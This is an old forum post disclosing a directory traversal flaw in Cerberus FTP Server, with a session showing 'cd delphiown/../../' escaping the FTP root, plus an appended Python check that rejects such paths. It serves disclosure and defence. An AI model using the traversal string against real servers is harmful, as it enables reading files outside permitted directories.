September 20th, 2001, 12:41 AM
#4
Junior Member
Most FTP servers are multithreaded, supporting the RFC 959 protocol completely. A security vulnerability in these products allows attackers to traverse outside the normal bounding FTP root directory and read arbitrary files on the system.
Example:
220-Welcome to Cerberus FTP Server
220 Created by Grant Averett
Benutzer (192.168.0.2 none)): anonymous
230 User anonymous logged in
ftp> ls
200 Port command received
150 Opening data connection
delphiown
226 Transfer complete
FTP: 11 Bytes empfangen in 0,00Sekunden 11000,00KB/s
ftp> cd delphiown/../../
250 Change directory ok
ftp> ls
200 Port command received
150 Opening data connection
As you can see, you need at least one valid directory to break out of the FTP root dir.
www.zxtech.net
ZXtech Unix Hosting
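A server-side check that refuses the "cd delphiown/../../" step from the session above, as an added example that is not part of the original post and not Cerberus FTP Server's own code. The names resolve_cwd and PathEscape, the "550 denied" string and the temporary root directory are hypothetical and constructed for illustration.

```python
import os
import posixpath
import tempfile


class PathEscape(Exception):
    """Raised when a client path resolves outside the FTP root."""


def resolve_cwd(ftp_root, virtual_cwd, arg):
    """Return (new_virtual_cwd, real_path) for a CWD argument, or raise."""
    # Treat backslashes as separators so both spellings are normalized alike.
    arg = arg.replace("\\", "/")
    # Resolve against the virtual cwd; an absolute argument restarts at "/".
    joined = posixpath.join(virtual_cwd, arg)
    # Walk component by component so ".." can never climb above "/",
    # even when it follows a directory that really exists.
    parts = []
    for comp in joined.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                raise PathEscape(arg)
            parts.pop()
        else:
            parts.append(comp)
    virtual = "/" + "/".join(parts)
    # Map to the real filesystem and re-check after symlink resolution.
    root_real = os.path.realpath(ftp_root)
    real = os.path.realpath(os.path.join(root_real, *parts))
    if os.path.commonpath([root_real, real]) != root_real:
        raise PathEscape(arg)
    if not os.path.isdir(real):
        raise FileNotFoundError(arg)
    return virtual, real


def demo():
    """Replay the CWD arguments from the session against a constructed root."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "delphiown"))  # constructed sample directory
        for arg in ("delphiown", "delphiown/..", "delphiown/../../"):
            try:
                results[arg] = resolve_cwd(root, "/", arg)[0]
            except PathEscape:
                results[arg] = "550 denied"
    return results
```

The check is applied to the whole normalized path, not only to whether the first component exists, which is the gap the session shows.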